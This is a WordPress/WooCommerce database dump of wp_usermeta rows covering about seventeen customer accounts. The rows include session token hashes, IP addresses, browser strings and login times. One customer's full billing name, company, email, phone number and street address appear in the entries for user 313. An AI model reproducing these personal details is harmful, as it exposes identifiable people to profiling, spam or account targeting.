INSERT INTO `wp_usermeta` VALUES (5307, 302, 'session_tokens', 'a:1:{s:64:"403ef9150c26633ad1a2a79eb0a29c7c3a00781697ca61eefab8f0b290dec3c8";a:4:{s:10:"expiration";i:1484659395;s:2:"ip";s:15:"108.171.131.187";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1483449795;}}'); 
INSERT INTO `wp_usermeta` VALUES (5308, 302, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (5309, 303, 'nickname', 'andre.rivera'); 
INSERT INTO `wp_usermeta` VALUES (5310, 303, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5311, 303, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5312, 303, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5313, 303, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5314, 303, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5315, 303, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5316, 303, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5317, 303, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5318, 303, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5319, 303, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5320, 303, '_yoast_wpseo_profile_updated', '1483482269'); 
INSERT INTO `wp_usermeta` VALUES (5321, 303, 'session_tokens', 'a:1:{s:64:"aabacfb6661535fe80e24aabfe71f6f1011d4ef1088e0e319891f37b84ac1c19";a:4:{s:10:"expiration";i:1484691870;s:2:"ip";s:14:"72.198.185.161";s:2:"ua";s:113:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36";s:5:"login";i:1483482270;}}'); 
INSERT INTO `wp_usermeta` VALUES (5322, 303, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (5323, 304, 'nickname', 'mncreec'); 
INSERT INTO `wp_usermeta` VALUES (5324, 304, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5325, 304, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5326, 304, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5327, 304, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5328, 304, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5329, 304, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5330, 304, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5331, 304, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5332, 304, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5333, 304, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5334, 304, '_yoast_wpseo_profile_updated', '1483483570'); 
INSERT INTO `wp_usermeta` VALUES (5335, 304, 'session_tokens', 'a:1:{s:64:"5c5ae3713476f07f57e76245c25d5e19638725175b9a7466a274b32e5aa26844";a:4:{s:10:"expiration";i:1484693171;s:2:"ip";s:15:"198.102.155.100";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0";s:5:"login";i:1483483571;}}'); 
INSERT INTO `wp_usermeta` VALUES (5336, 39, 'wpseo_title', ''); 
INSERT INTO `wp_usermeta` VALUES (5337, 39, 'wpseo_metadesc', ''); 
INSERT INTO `wp_usermeta` VALUES (5338, 39, 'wpseo_metakey', ''); 
INSERT INTO `wp_usermeta` VALUES (5339, 39, 'wpseo_excludeauthorsitemap', ''); 
INSERT INTO `wp_usermeta` VALUES (5340, 39, 'wpseo_content_analysis_disable', ''); 
INSERT INTO `wp_usermeta` VALUES (5341, 39, 'wpseo_keyword_analysis_disable', ''); 
INSERT INTO `wp_usermeta` VALUES (5342, 39, 'billing_first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5343, 39, 'billing_last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5344, 39, 'billing_company', ''); 
INSERT INTO `wp_usermeta` VALUES (5345, 39, 'billing_address_1', ''); 
INSERT INTO `wp_usermeta` VALUES (5346, 39, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (5347, 39, 'billing_city', ''); 
INSERT INTO `wp_usermeta` VALUES (5348, 39, 'billing_postcode', ''); 
INSERT INTO `wp_usermeta` VALUES (5349, 39, 'billing_country', ''); 
INSERT INTO `wp_usermeta` VALUES (5350, 39, 'billing_state', ''); 
INSERT INTO `wp_usermeta` VALUES (5351, 39, 'billing_phone', ''); 
INSERT INTO `wp_usermeta` VALUES (5352, 39, 'billing_email', ''); 
INSERT INTO `wp_usermeta` VALUES (5353, 39, 'shipping_first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5354, 39, 'shipping_last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5355, 39, 'shipping_company', ''); 
INSERT INTO `wp_usermeta` VALUES (5356, 39, 'shipping_address_1', ''); 
INSERT INTO `wp_usermeta` VALUES (5357, 39, 'shipping_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (5358, 39, 'shipping_city', ''); 
INSERT INTO `wp_usermeta` VALUES (5359, 39, 'shipping_postcode', ''); 
INSERT INTO `wp_usermeta` VALUES (5360, 39, 'shipping_country', ''); 
INSERT INTO `wp_usermeta` VALUES (5361, 39, 'shipping_state', ''); 
INSERT INTO `wp_usermeta` VALUES (5362, 39, 'googleplus', ''); 
INSERT INTO `wp_usermeta` VALUES (5363, 39, 'twitter', ''); 
INSERT INTO `wp_usermeta` VALUES (5364, 39, 'facebook', ''); 
INSERT INTO `wp_usermeta` VALUES (5365, 39, 'last_update', '1487011733'); 
INSERT INTO `wp_usermeta` VALUES (5366, 2, 'wpseo-remove-upsell-notice', '1'); 
INSERT INTO `wp_usermeta` VALUES (5367, 305, 'nickname', 'frankt'); 
INSERT INTO `wp_usermeta` VALUES (5368, 305, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5369, 305, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5370, 305, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5371, 305, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5372, 305, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5373, 305, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5374, 305, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5375, 305, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5376, 305, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5377, 305, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5378, 305, '_yoast_wpseo_profile_updated', '1483540464'); 
INSERT INTO `wp_usermeta` VALUES (5379, 305, 'session_tokens', 'a:1:{s:64:"25be44f26d68a32e177feee3be1119aa536ca5112665f50670ab3f95f3ad0dcc";a:4:{s:10:"expiration";i:1484750065;s:2:"ip";s:12:"69.74.16.242";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0";s:5:"login";i:1483540465;}}'); 
INSERT INTO `wp_usermeta` VALUES (5380, 306, 'nickname', 'joseph.c.phillips'); 
INSERT INTO `wp_usermeta` VALUES (5381, 306, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5382, 306, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5383, 306, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5384, 306, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5385, 306, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5386, 306, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5387, 306, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5388, 306, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5389, 306, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5390, 306, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5391, 306, '_yoast_wpseo_profile_updated', '1483541105'); 
INSERT INTO `wp_usermeta` VALUES (5392, 306, 'session_tokens', 'a:1:{s:64:"f23c38f3ed2b57dbe42b1ac1b7e58b8dd6520f3f6d9dabf1ec508e794ce47da2";a:4:{s:10:"expiration";i:1484750706;s:2:"ip";s:13:"131.78.83.135";s:2:"ua";s:61:"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1483541106;}}'); 
INSERT INTO `wp_usermeta` VALUES (5393, 307, 'nickname', 'knitandsew44'); 
INSERT INTO `wp_usermeta` VALUES (5394, 307, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5395, 307, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5396, 307, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5397, 307, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5398, 307, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5399, 307, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5400, 307, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5401, 307, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5402, 307, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5403, 307, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5404, 307, '_yoast_wpseo_profile_updated', '1483549320'); 
INSERT INTO `wp_usermeta` VALUES (5405, 307, 'session_tokens', 'a:1:{s:64:"433c4098115f40025c3b19d2b5ea4652ac0bf67700cae70973a9c0e650e49516";a:4:{s:10:"expiration";i:1484758921;s:2:"ip";s:13:"73.188.224.81";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36";s:5:"login";i:1483549321;}}'); 
INSERT INTO `wp_usermeta` VALUES (5406, 307, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (5407, 308, 'nickname', 'rossiga'); 
INSERT INTO `wp_usermeta` VALUES (5408, 308, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5409, 308, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5410, 308, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5411, 308, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5412, 308, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5413, 308, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5414, 308, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5415, 308, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5416, 308, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5417, 308, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5418, 308, '_yoast_wpseo_profile_updated', '1483553154'); 
INSERT INTO `wp_usermeta` VALUES (5419, 308, 'session_tokens', 'a:1:{s:64:"1757f7bb094aad7b1f17a5226ecfdc004c7c97cc31e293966470f229b1566555";a:4:{s:10:"expiration";i:1484762755;s:2:"ip";s:11:"66.199.9.20";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1483553155;}}'); 
INSERT INTO `wp_usermeta` VALUES (5420, 2, 'abtf_show_offer', '0'); 
INSERT INTO `wp_usermeta` VALUES (5421, 2, 'jetpack_tracks_wpcom_id', '115164932'); 
INSERT INTO `wp_usermeta` VALUES (5422, 309, 'nickname', 'manuel.hernandez'); 
INSERT INTO `wp_usermeta` VALUES (5423, 309, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5424, 309, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5425, 309, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5426, 309, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5427, 309, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5428, 309, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5429, 309, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5430, 309, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5431, 309, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5432, 309, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5433, 309, '_yoast_wpseo_profile_updated', '1483557861'); 
INSERT INTO `wp_usermeta` VALUES (5434, 309, 'session_tokens', 'a:1:{s:64:"45b743d122724c6958772a3c124c37b861962ce5dd386036c6f9c33d0378d557";a:4:{s:10:"expiration";i:1490819133;s:2:"ip";s:12:"162.58.0.144";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36";s:5:"login";i:1490646333;}}'); 
INSERT INTO `wp_usermeta` VALUES (5435, 310, 'nickname', 'rocky.gao'); 
INSERT INTO `wp_usermeta` VALUES (5436, 310, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5437, 310, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5438, 310, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5439, 310, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5440, 310, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5441, 310, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5442, 310, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5443, 310, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5444, 310, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5445, 310, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5446, 310, '_yoast_wpseo_profile_updated', '1483593037'); 
INSERT INTO `wp_usermeta` VALUES (5447, 310, 'session_tokens', 'a:2:{s:64:"a90a4c12c3beea99b7157445a32e8d28f3b9265178dc8756906ba75a2d0be20d";a:4:{s:10:"expiration";i:1484802639;s:2:"ip";s:15:"117.131.242.234";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36";s:5:"login";i:1483593039;}s:64:"319ae815e74ae325b0235d422acce81b043d9edf534593e757e26b6a10f24549";a:4:{s:10:"expiration";i:1484802685;s:2:"ip";s:15:"117.131.242.234";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36";s:5:"login";i:1483593085;}}'); 
INSERT INTO `wp_usermeta` VALUES (5448, 310, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (5449, 311, 'nickname', 'riece'); 
INSERT INTO `wp_usermeta` VALUES (5450, 311, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5451, 311, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5452, 311, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5453, 311, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5454, 311, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5455, 311, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5456, 311, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5457, 311, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5458, 311, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5459, 311, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5460, 311, '_yoast_wpseo_profile_updated', '1483624132'); 
INSERT INTO `wp_usermeta` VALUES (5461, 311, 'session_tokens', 'a:1:{s:64:"cfa1311cd8623619eea879dbcef4e4e4e123ab0288b2b777e6ff829acd81792e";a:4:{s:10:"expiration";i:1484833733;s:2:"ip";s:13:"24.249.194.44";s:2:"ua";s:69:"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MDDRJS; rv:11.0) like Gecko";s:5:"login";i:1483624133;}}'); 
INSERT INTO `wp_usermeta` VALUES (5462, 312, 'nickname', 'gary.thomas'); 
INSERT INTO `wp_usermeta` VALUES (5463, 312, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5464, 312, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5465, 312, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5466, 312, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5467, 312, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5468, 312, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5469, 312, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5470, 312, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5471, 312, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5472, 312, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5473, 312, '_yoast_wpseo_profile_updated', '1483628314'); 
INSERT INTO `wp_usermeta` VALUES (5474, 312, 'session_tokens', 'a:1:{s:64:"73fec2b3312ea341816cb98de735ca4c5bc8a770ad5f867c2280bea7cda3c3ca";a:4:{s:10:"expiration";i:1484837915;s:2:"ip";s:14:"66.152.125.154";s:2:"ua";s:61:"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1483628315;}}'); 
INSERT INTO `wp_usermeta` VALUES (5475, 313, 'nickname', 'marylee.deford'); 
INSERT INTO `wp_usermeta` VALUES (5476, 313, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5477, 313, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5478, 313, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5479, 313, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5480, 313, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5481, 313, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5482, 313, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5483, 313, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5484, 313, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5485, 313, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5486, 313, '_yoast_wpseo_profile_updated', '1483633004'); 
INSERT INTO `wp_usermeta` VALUES (5488, 313, 'billing_first_name', 'Marylee'); 
INSERT INTO `wp_usermeta` VALUES (5489, 313, 'billing_last_name', 'DeFord'); 
INSERT INTO `wp_usermeta` VALUES (5490, 313, 'billing_company', 'Texstars LLC'); 
INSERT INTO `wp_usermeta` VALUES (5491, 313, 'billing_email', 'marylee.deford@texstars.com'); 
INSERT INTO `wp_usermeta` VALUES (5492, 313, 'billing_phone', '972-647-1366'); 
INSERT INTO `wp_usermeta` VALUES (5493, 313, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (5494, 313, 'billing_address_1', '802 East Avenue J'); 
INSERT INTO `wp_usermeta` VALUES (5495, 313, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (5496, 313, 'billing_city', 'Grand Prairie'); 
INSERT INTO `wp_usermeta` VALUES (5497, 313, 'billing_state', 'TX'); 
INSERT INTO `wp_usermeta` VALUES (5498, 313, 'billing_postcode', '75050'); 
INSERT INTO `wp_usermeta` VALUES (5499, 314, 'nickname', 'Lisa.Wilson'); 
INSERT INTO `wp_usermeta` VALUES (5500, 314, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5501, 314, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5502, 314, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5503, 314, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5504, 314, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5505, 314, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5506, 314, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5507, 314, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5508, 314, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5509, 314, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5510, 314, '_yoast_wpseo_profile_updated', '1483635515'); 
INSERT INTO `wp_usermeta` VALUES (5511, 314, 'session_tokens', 'a:1:{s:64:"83070e566e3252bc69cbbc7dccc53b8a4c432e40e2ab427b15887708e4e69e61";a:4:{s:10:"expiration";i:1484845116;s:2:"ip";s:14:"205.193.209.10";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1483635516;}}'); 
INSERT INTO `wp_usermeta` VALUES (5512, 313, 'session_tokens', 'a:2:{s:64:"d52f84723891e70ad152aec025a38bf73c1ebc8d40252a26f6c2c9426ef8b0ab";a:4:{s:10:"expiration";i:1483808691;s:2:"ip";s:14:"209.252.15.233";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0";s:5:"login";i:1483635891;}s:64:"9ea2e7cc366ebb7b9d7432340f6587c0086eccca7d1addf70bebda7fb0670aee";a:4:{s:10:"expiration";i:1483903747;s:2:"ip";s:14:"209.252.15.233";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0";s:5:"login";i:1483730947;}}'); 
INSERT INTO `wp_usermeta` VALUES (5513, 313, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (5514, 315, 'nickname', 'yulia.gudkova'); 
INSERT INTO `wp_usermeta` VALUES (5515, 315, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5516, 315, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5517, 315, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5518, 315, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5519, 315, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5520, 315, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5521, 315, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5522, 315, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5523, 315, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5524, 315, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5525, 315, '_yoast_wpseo_profile_updated', '1483639326'); 
INSERT INTO `wp_usermeta` VALUES (5526, 315, 'session_tokens', 'a:1:{s:64:"0bc95c395f3fe56c7ef7880e9db47cd4e54366cc5dd3ee599ff686e1008ffd0c";a:4:{s:10:"expiration";i:1484848927;s:2:"ip";s:15:"209.139.228.161";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36";s:5:"login";i:1483639327;}}'); 
INSERT INTO `wp_usermeta` VALUES (5527, 316, 'nickname', 'nathaniel.moore'); 
INSERT INTO `wp_usermeta` VALUES (5528, 316, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5529, 316, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5530, 316, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5531, 316, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5532, 316, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5533, 316, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5534, 316, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5535, 316, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5536, 316, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5537, 316, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5538, 316, '_yoast_wpseo_profile_updated', '1483639567'); 
INSERT INTO `wp_usermeta` VALUES (5539, 316, 'session_tokens', 'a:1:{s:64:"f0a7427ade75ebc3de184c61424027d40cdbdd6a03d981415c9896a278716cc0";a:4:{s:10:"expiration";i:1484849168;s:2:"ip";s:13:"70.102.112.82";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1483639568;}}'); 
INSERT INTO `wp_usermeta` VALUES (5540, 317, 'nickname', 'jstephens'); 
INSERT INTO `wp_usermeta` VALUES (5541, 317, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5542, 317, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5543, 317, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5544, 317, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5545, 317, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5546, 317, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5547, 317, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5548, 317, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5549, 317, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5550, 317, 'wp_user_level', '10'); 
INSERT INTO `wp_usermeta` VALUES (5551, 317, '_yoast_wpseo_profile_updated', '1497536859'); 
INSERT INTO `wp_usermeta` VALUES (5553, 318, 'nickname', 'mjohnson'); 
INSERT INTO `wp_usermeta` VALUES (5554, 318, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5555, 318, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5556, 318, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5557, 318, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5558, 318, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5559, 318, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5560, 318, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5561, 318, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5562, 318, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5563, 318, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5564, 318, '_yoast_wpseo_profile_updated', '1483708124'); 
INSERT INTO `wp_usermeta` VALUES (5565, 318, 'session_tokens', 'a:1:{s:64:"3fbf5c312321bef4214832542f81ed1c956f2baad7753809390976c16772f7c6";a:4:{s:10:"expiration";i:1484917725;s:2:"ip";s:12:"24.97.84.142";s:2:"ua";s:116:"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7";s:5:"login";i:1483708125;}}'); 
INSERT INTO `wp_usermeta` VALUES (5567, 34, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
